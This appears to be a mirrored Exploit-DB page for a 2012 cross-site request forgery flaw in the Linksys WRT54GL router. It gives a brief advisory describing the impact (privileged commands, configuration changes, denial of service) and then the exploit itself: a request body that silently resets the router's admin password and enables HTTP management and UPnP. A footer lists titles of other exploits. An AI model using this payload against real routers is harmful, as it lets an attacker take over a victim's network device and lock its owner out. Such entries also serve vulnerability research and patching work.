Linksys WRT54GL Wireless Router – Cross-Site Request Forgery

Exploit Database
38 阅读

作者： Kalashinkov3

日期： 2012-05-08
类别：
- remote
平台：
- hardware
来源：https://www.exploit-db.com/exploits/37141/

source: https://www.securityfocus.com/bid/53427/info

The Linksys WRT54GL router is prone to a cross-site request-forgery vulnerability.

Successful exploits may allow attackers to run privileged commands on the affected device, change configuration, cause denial-of-service conditions, or inject arbitrary script code. Other attacks are also possible. 

submit_button=Management&change_action=&action=Apply&PasswdModify=1&remote_mgt_https=0&http_enable=1&https_enable=0&wait_time=4&need_reboot=0&http_passwd=YOUR PASSWORD&http_passwdConfirm=YOUR PASSWORD&_http_enable=1&web_wl_filter=0&remote_management=0&upnp_enable=1

last Exploits
Linksys WRT54GL Wireless Router – Cross-Site Request Forgery的更多信息

Eaton Xpert Meter 13.4.0.10 – SSH Private Key Disclosure：
Opera Browser 10/11/12 – ‘SVG Layout’ Memory Corruption (Metasploit)：
FTPShell Client 6.53 – Remote Buffer Overflow：
Mercury/32 Mail SMTPD – AUTH CRAM-MD5 Buffer Overflow (Metasploit)：
SolarWinds LEM 6.3.1 – Remote Code Execution (Metasploit)：
Microsoft Windows – ‘SMBGhost’ Remote Code Execution：
Microsoft Windows – OLE Object File Handling Remote Code Execution (Metasploit)：
Sync Breeze Enterprise 9.1.16 – ‘Login’ Remote Buffer Overflow：